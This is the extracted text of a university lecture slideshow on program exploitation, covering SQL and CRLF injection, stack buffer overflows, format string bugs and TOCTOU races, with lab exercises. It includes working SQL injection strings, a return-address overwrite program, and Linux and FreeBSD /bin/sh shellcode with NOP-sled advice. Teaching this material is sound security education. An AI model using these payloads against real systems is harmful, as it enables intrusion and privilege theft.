Basics in program manipulation hacking - PowerPoint PPT Presentation

1 / 90
About This Presentation
Title:

Basics in program manipulation hacking

Description:

Most common payload, opens a shell in linux. Basic hacking techniques ... Sparc has other opcodes. Basic hacking techniques. Example 6 Try this yourself, target: ... – PowerPoint PPT presentation

Number of Views:74
Avg rating:3.0/5.0
Slides: 91
Provided by: rolfhu
Category:

less

Transcript and Presenter's Notes

Title: Basics in program manipulation hacking


1
Basics in program manipulation (hacking)
  • Ing. R.L.R. Huisman

2
Why should we should check software ?
Second Hidden Title
  • Ing. R.L.R. Huisman

3
Index
  • What is program manipulation ?
  • Organizational matters
  • Injections (SQL and CLRF)
  • Buffer overflow/underflow
  • Format String bugs
  • TOCTOU
  • Conclusion
  • Pointers

4
Who the is that ?
  • Rolf Huisman, 23 years, girlfriend for 3 years
  • Computers since I was 5
  • Bachelor of ICT (HIO) Saxion Enschede
  • Currently Graduating for
  • Master of Computer Sience (Here on the UT) ?
  • Technical advice to technical issues to many
    companies (including the Saxion Hogeschool and
    Inter-Actief)
  • Former Technical Manager for the Inter-Actief
    Web-Site System, ACM member

5
Program manipulation ?
  • Manipulate a program so its behavior differs from
    its intended behavior
  • Normally used in combination with social
    engineering while penetration testing.
  • (Penetration as in security, not girlfriend)
  • This Presentation, just the technical stuff,
    leaving out the user as target (no XSS, etc)

6
Program manipulation ?
  • Negative image because of crackers/hackers
  • University of Texas loses 197,000 records
  • Sql Injection (24-04-2006)
  • 200 Websites using zero day exploit (IE)
  • Buffer overflow (28-03-2006)
  • http//www.securityfocus.com/

7
Program manipulation ?
  • My opinion
  • Teach people what goes wrong, so they think about
    it before doing wrong
  • Therefore I said yes to this.

8
Organizational matters
  • Get permission, otherwise its illegal
  • You already can get 6 Months if nothing bad
    happens.
  • In case of a hospital shutdown e.g. you could get
    2 Years (Involuntary Manslaughter)
  • RESPECT THE LAW
  • In general article 138a of the criminal code

9
Organizational matters
  • 138a of the Criminal Code (new Version)

10
Organizational matters
  • 138a of the Criminal Code (new Version)
  • SO GET PERMISSION, OR DONT DO AT ALL

11
Organizational matters
  • 138a of the Criminal Code (new Version)
  • SO GET PERMISSION, OR DONT DO

12
Organizational matters
  • What is allowed to hack
  • The designated server (ip lttodogt)
  • What isnt allowed to Hack
  • THE REST of the world

13
Organizational matters
  • Great power comes with greater responsibility
    (uncle Ben, Spiderman)
  • If you screw up, misuse or do something else with
    this knowledge its your own responsibility
  • I, CS, UT and Inter-Actief dont accept liability
  • So anyone who doesnt agree to all of this
  • !!! LEAVE NOW !!!

14
Organizational matters
  • Please raise your hand if this applies to you.
  • Who has never programmed ?
  • This may be a little bit difficult, because we
    arent talking social engineering. But hey, new
    day, new chances.

15
Organizational matters
  • Please raise your hand if this applies to you.
  • Who has never programmed in C or C
  • Its not a shame, because lots of people havent.
    But you will never look with the same eyes to
    your language again.

16
Organizational matters
  • Please raise your hand if this applies to you.
  • Who doesnt know SQL
  • Some things can be translated to textfiles as
    well. But since many make use of sql, make sure
    youl learn it one day.

17
Organizational matters
  • Please raise your hand if this applies to you.
  • Dont know linux or unix

18
Organizational matters
  • Please raise your hand if this applies to you.
  • Dont know linux
  • Dont care. Stuff applies to every OS.
  • But remember while experimenting buffer
    overflows are often protected nowdays

19
Basic hacking techniques
  • There are a few basic techniques (Bugs)
  • Symlink races
  • Input validation
  • Buffer overflows
  • Time-of-check-to-time-of-use (TOCTOU)
  • These can by combined with other techniques

20
Basic hacking techniques
  • Symbolic races
  • Program makes a temporary file
  • Program just overwrites it
  • Make a symlink already with that name
  • Program overwrites targetfile

21
Basic hacking techniques
  • Example
  • One Setuid program (has god rights P)
  • Creates the file /tmp/temp and adds
  • Attacker creates symlink from the temp file to
    /etc/.rhosts
  • When the file is removed, symlink is gone
  • Since .rhosts contains so, logons as root
    without a password

22
Basic hacking techniques
  • Input validation
  • Shell metacharacters
  • Injections
  • Sql
  • CRLF
  • Format String bugs (after buffer overflows)

23
Basic hacking techniques
  • Program is executed with parameters like
  • Exec(./prog arg)
  • When arg contains shell metacharacters
  • Like
  • Other commands can be executed
  • Arg cat /etc/passwd
  • Exec(./prog cat /etc/passwd)

24
Basic hacking techniques
  • Injection
  • Inserting extra information so its get processed
    different.
  • Most common used injection is SQL injection.
  • SQL injections are often the reason why
    information has leaked or a DB-server is hacked
    in a company

25
Basic hacking techniques
  • We have a function, anyone see a problem ?
  • Bool val (string name, string passwd)
  • String query select name from users
  • where name name
  • and passwd passwd
  • ResultSet set doquery(query)
  • return set.hasElements()

26
Basic hacking techniques
  • We have a function, anyone see a problem ?
  • Bool val (string name, string passwd)
  • String query select name from users
  • where name name
  • and passwd passwd
  • ResultSet set doquery(query)
  • return set.hasElements()
  • No checks, means money P

27
Basic hacking techniques
  • rolf,apple whould result in
  • Select name from users where name rolf and
    passwd apple
  • But root, or 1 1 -- would result in
  • Select name from users where name root and
    passwd or 1 1--

28
Basic hacking techniques
  • rolf,apple whould result in
  • Select name from users where name rolf and
    passwd apple
  • But root, or 1 1 -- would result in
  • Select name from users where name root and
    passwd or 1 1--
  • Thus the system would return elements

29
Basic hacking techniques
  • So lets try this ourself
  • IP address http//130.89.8.33 test server
  • Example 1
  • In example 2, he did a naive fix
  • He replaced al by \ try that one as well

30
Basic hacking techniques
  • Example 2
  • Naive fix, replace by \
  • Hint what does \\ mean

31
Basic hacking techniques
  • Example 2 solution
  • Use \ behind each other.
  • \ get replaced by \\ where the \\ is seen as a
    \ and the is correctly noticed.
  • So
  • root,\ or 1 1 --

32
Basic hacking techniques
  • Example 3 is a lookup which has the same flaw.
  • The items table
  • The completed search sql string is
  • Select name from items where id 8
  • Try to read the usernames from table users
  • Hint, Union can combine tables of different names
  • Like select 1 from a union select 2 from b

33
Basic hacking techniques
  • Example 3
  • You dont need to use a because its expecting
    a number
  • or 11 would result in returning the whole
    search table, as in not good
  • or 1 1 union select name from users --
  • Returns the names.
  • One could even use system calls in sql (try this
    home)
  • Conclusion security is needed everywhere, even
    parts that dont handle authorisation

34
Basic hacking techniques
  • So what about other injections ?
  • CRLF (clear line feed) injections
  • The combination character 10 and 13 (\r\n) behind
    each other is considered a return
  • (Windows endline vs unix vs old apple)

35
Basic hacking techniques
  • CRLF injections
  • private StringBuffer log new StringBuffer()
  • void log(String message)
  • log.append(System.currenttimemillis())
  • log.append()
  • log.append(message)
  • log.append(\n)

36
Basic hacking techniques
  • CRLF injections
  • private StringBuffer log new StringBuffer()
  • void synchronized log(String message)
  • log.append(System.currentTimeMillis())
  • log.append()
  • log.append(message)
  • log.append(\n)
  • Not filtered

37
Basic hacking techniques
  • void logAccessDenied(String userName)
  • log(userName doesnt have access)
  • With username
  • Reddog logged off\n13212131Charly
  • Would result in the log showing
  • 13212130Reddog logged off
  • 13212131Charly doesnt have access
  • Thus creating the illussion reddog wasnt there

38
Basic hacking techniques
  • Example 4
  • Try this yourself at the server
  • Create a false log entry which cant be
    destinguised.

39
Basic hacking techniques
  • Example 4 Is the other way around P
  • Charly\n13212131Reddog Logged off
  • And yes, I do filter on html tags

40
Basic hacking techniques
  • Buffer overflows
  • Hardest problem to spot thus most commonly found
    security feature
  • More difficult to exploit then insertions
  • Buffer overflows is a type of exploits
  • Public known term buffer overflows should be
    stack smashes (official term)
  • Based on the way code is executed
  • Sometimes can be countered by NX and stack
    protectors (DEP, canary, non executable stack)

41
Basic hacking techniques
  • Memory ordering in a Process
  • 3 Elements
  • Stack
  • Data (or the heap)
  • Text (readonly)

Text
Data
Stack
42
Basic hacking techniques
  • Memory ordering in a Process
  • 3 Elements
  • Stack
  • Data
  • Text
  • Growing

Text
Data or the heap
Stack
43
Basic hacking techniques
  • So, whats this stack used for
  • Calling of functions
  • If a function calls an other function, it puts it
    on the stack, hence execution stack

44
Basic hacking techniques
  • Conceptualy When a Computer adds 1 1

1
1
45
Basic hacking techniques
  • Conceptualy When a Computer adds 1 1
  • It pops the items of the stack
  • Does its calculation
  • And puts te result on the stack

2
46
Basic hacking techniques
  • When a program calls a function
  • It pushes old execution location on the stack
    with the StackRegister pointing to it

Old Location
47
Basic hacking techniques
  • When a program calls a function
  • It pushes the old execution location on the
    stack, and keeps on going

1
1
2
Old Location
Old Location
48
Basic hacking techniques
  • When returning a function, the program returns to
    the location, designated by the stack
  • Setting the execution pointer to the old location.

2
Old Location
49
Basic hacking techniques
  • This stack in memory is flat
  • Growing from right to left
  • Where the variables are written from left to right

Old Location
2
50
Basic hacking techniques
  • So you have the stack with reserved static room
    for the variable
  • When supplying a to long variable
  • You override the return pointer

Room
Return Pointer
Padding Frame p
Rest stack
Overflow
Return Pointer
Overflow
Return Pointer
Rest stack
51
Basic hacking techniques
  • Then the code the return pointer is pointing to,
    gets executed
  • Since this is your pointer, your code gets
    executed

Bad Code P
Return Pointer
Rest stack
52
Basic hacking techniques
  • Exception STATUS_ACCESS_VIOLATION at
    eip004010C4
  • eax00000000 ebx00000004 ecx7C90FB71
    edx0000000D esi6115E6D9 edi61102C18
    ebp00224010 esp0022EEA0 programC\cygwin\home\r
    eddog\prog1a.exe, pid 884, thread main
  • cs001B ds0023 es0023 fs003B gs0000 ss0023
  • In the dump
  • Execution pointer (what am I executing)
  • EIP
  • Stack Pointer (location of return pointer)
  • ESP

53
Basic hacking techniques
  • So, how can we do that ? Our target
  • int main()
  • int rechten 0
  • leesIets()
  • if (rechten)
  • secure
  • printf("We will transfer the money\n")
  • else
  • printf("Forget it (p)\n", secure)

54
Basic hacking techniques
  • So, how can we do that ?
  • int main()
  • int rechten 0
  • leesIets()
  • if (rechten)
  • secure
  • printf("We will transfer the money\n")
  • else
  • printf("Forget it (p)\n", secure)

55
Basic hacking techniques
  • So, how can we do that ?
  • int main()
  • int rechten 0
  • leesIets()
  • if (rechten)
  • secure
  • printf("We will transfer the money\n")
  • else
  • printf("Forget it (p)\n", secure)

56
Basic hacking techniques
  • Executing on I386 freebsd
  • echo ./prog1a
  • Forget it (0x804858e)
  • Hmm no rights to transfer money
  • But the memmory location of secure on freebsd
    0x804858e

57
Basic hacking techniques
  • So, how can we use that ?
  • int main()
  • int rechten 0
  • leesIets() Bug
  • if (rechten)
  • secure
  • printf("We will transfer the money\n")
  • else
  • printf("Forget it (p)\n", secure)

58
Basic hacking techniques
  • void leesIets()
  • char input128
  • static int c 0
  • while ( read(0, input c, 1) 1 ) 0

59
Basic hacking techniques
  • void leesIets()
  • char input128
  • static int c 0
  • while ( read(0, input c, 1) 1 ) 0

60
Basic hacking techniques
  • int pointer 0x804858e //address of secure
  • int main()
  • write(1, buf, 128) // buffer
  • write(1, buf, 8) // padding (optional)
  • write(1, buf, 4) // stack frame (optional)
  • write(1, pointer, 4) // return adress
  • //Note pointer gives e8850408

61
Basic hacking techniques
  • Execution Freebsd (Intel x86)
  • ./prog1b ./prog1a
  • We will transfer the money
  • Segmentation fault (core dumped)
  • Execution Windows XP SFU with DEP turned off
  • ./prog1b ./prog1a
  • We will transfer the money
  • Segmentation fault (core dumped)

62
Basic hacking techniques
  • Example 5 Try it yourself
  • Use backslash hex numbers to create your
    characters, and oveflow it P
  • e.g. \x00\x00 two zero characters
  • A character is one byte (8bit)
  • Target machine is a Intel x86 with 32 bit
    pointers
  • E.G. Pointer 0x4010ca \xca\x10\x40\x00

63
Basic hacking techniques
  • Example 5
  • If it works, nicely done, you understood it.
  • If it doesnt, try running without the exploit,
    see any differences ?
  • Hint, one machine isnt like the other. Maybee
    its not running freebsd

64
Basic hacking techniques
  • Example 5
  • The example runs windows
  • So you need to point the pointer to a different
    location.
  • Thats why we needed that address.
  • It was changed for the windows version.

65
Basic hacking techniques
  • But I want execute my own code
  • You just put the executing code in the overload
    code and point to it.
  • This is code called The payload

Return Pointer
Own Code
66
Basic hacking techniques
  • But, where to point ?
  • Guessing most of the time
  • But to allow more inaccurate pointer
  • Just add NOPs, There (\x90 x86)
  • And add the return pointer more often

Return Pointer
Own Code
Return Pointer
Return Pointer
NOPs
67
Basic hacking techniques
  • Most of time shared payloads
  • "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\
    x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xc
    d\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\
    xff/bin/sh\xeb\xeb\xeb
  • Most common payload, opens a shell in linux

68
Basic hacking techniques
  • Most of time shared payloads
  • "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e"
  • "\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73"
  • "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
  • "\x53\x50\xb0\x3b\xcd\x80
  • Most common payload, opens a shell in freebsd

69
Basic hacking techniques
  • Most of time shared payloads
  • "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e"
  • "\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73"
  • "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
  • "\x53\x50\xb0\x3b\xcd\x80
  • Shellcode contains memmory addresses,
  • Because stacks memmory mapping differs per OS
    match your payload with your targets OS
  • Otherwise you will get memmory violations

70
Basic hacking techniques
  • Special things to take care
  • Freebsd allows just 64 nops
  • Windows is different then Windows Cygwin
  • Openbsd has a randomized stack
  • Solaris 9 the location is different then 8
  • Sparc has other opcodes

71
Basic hacking techniques
  • Example 6 Try this yourself, target
  • void leesIets()
  • char input128
  • static int c 0
  • printf(Location of input p,input)
  • while ( read(0, input c, 1) 1 ) 0
  • \x00\xee\x22\x00
  • Int main()leesIets() //Try to open a shell

72
Basic hacking techniques
  • Example 6
  • Nops (max 64) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\
    x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x0
    8\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\
    xe8\xdc\xff\xff\xff/bin/sh\xeb\xeb\xeb return
    pointers

73
Basic hacking techniques
  • Heap overflows
  • Same thing, but in the heap memmory
  • More difficult to exploit, because you need to
    create another stack overflow to change the
    execution pointer

74
Basic hacking techniques
  • Buffer Underrun
  • Buffer is filled the other way arround
  • Usualy an attempt to not get buffer overflows.
    But essentialy a heap overflow

Stack
75
Basic hacking techniques
  • Format string attack
  • More variations on the buffer overflow
  • Easy to spot, hard to exploit
  • Found in 1999

76
Basic hacking techniques
  • The mistake
  • void function (char hello)
  • printf(hello)
  • printf(hello) should be printf(s,hello)
  • Why is this bad ?

77
Basic hacking techniques
  • Why is this bad ?
  • The compiler
  • printf (s, string) gives a pointer on the
    stack
  • Printf (string) gets interpreted code
  • With features like
  • p buffer location on the stack
  • x print decimals

78
Basic hacking techniques
  • printf (Its \x25d\n", 23)

23
Rest
Printf
79
Basic hacking techniques
  • printf (Its \x25d\n", 23)
  • printf ("ssssssssss")

23
Rest
Printf
Rest
Printf
80
Basic hacking techniques
  • Why does this happen ?
  • Broken by design
  • Normaly
  • The arguments for printf are put on the stack
  • Printf is called
  • Our case
  • Format string is on the stack
  • Printf is called.
  • But printf doesnt know how big its arguments are

81
Basic hacking techniques
  • Key 08x
  • printf("\xc0\xc8\xff\xbf_08x.08x.08x.08x.08x.
    n")
  • Overrides the pointers, rest the same

82
Basic hacking techniques
  • Time-of-check-to-time-of-use (TOCTOU)
  • Known since 1996 but realy rediscovered in (2004)
  • Going to hear a lot about them in the future
  • Change the world in the time between checking
    and executing

83
Basic hacking techniques
  • TOCTOU
  • Target Code
  • if(hasAccess(file))
  • stream open(file,O_RDONLY)
  • Whats wrong ????

84
Basic hacking techniques
  • TOCTOU
  • Target Code
  • if(hasAccess(file))
  • stream open(file,O_RDONLY)
  • It takes time between the access and the open

85
Basic hacking techniques
  • Exploiting
  • file /tmp/temp //symlink to own file
  • if(hasAccess(file))
  • //change symlink to target
  • stream open(file,O_RDONLY)
  • Main trick, getting timing right

86
Basic hacking techniques
  • Create a maze with symlinks keeping the os busy,
    pumping the machine with processes so it slows
    down

87
Basic hacking techniques
  • Create a maze with symlinks keeping the os busy,
    pumping the machine with processes so it slows
    down
  • Right tactics, 70 chance of entry

88
REMEMBER
  • GET PERMISSION first, then try.
  • The government is itching to get a hacker
    prosecuted (good pr). So there itching to arrest
    anyone stepping out of line.
  • The permission to hack the server are now
    revoked. Please do not try to hack that IP
    anymore, this server isnt there anymore

89
Conclusions
  • Try to think beyond the obvious
  • Dont believe in security through obscurity
  • Try to program defensively
  • Review code by other people and look for these
    kinds of mistakes (you will be more able to find
    them since you know them)
  • And if possible, use managed languages and/or
    stack/heap protectors

90
Pointers
  • Buffer overflows in more detail
  • www.maths.leeds.ac.uk/read/bofs.html
  • TOCTOU
  • www.cs.berkeley.edu/nks/papers/races-usenix05.pdf
  • General news
  • www.securityfocus.com
  • This presentation
  • wwwhome.cs.utwente.nl/huismanrlr/inter-actief/
Write a Comment
User Comments (0)
About PowerShow.com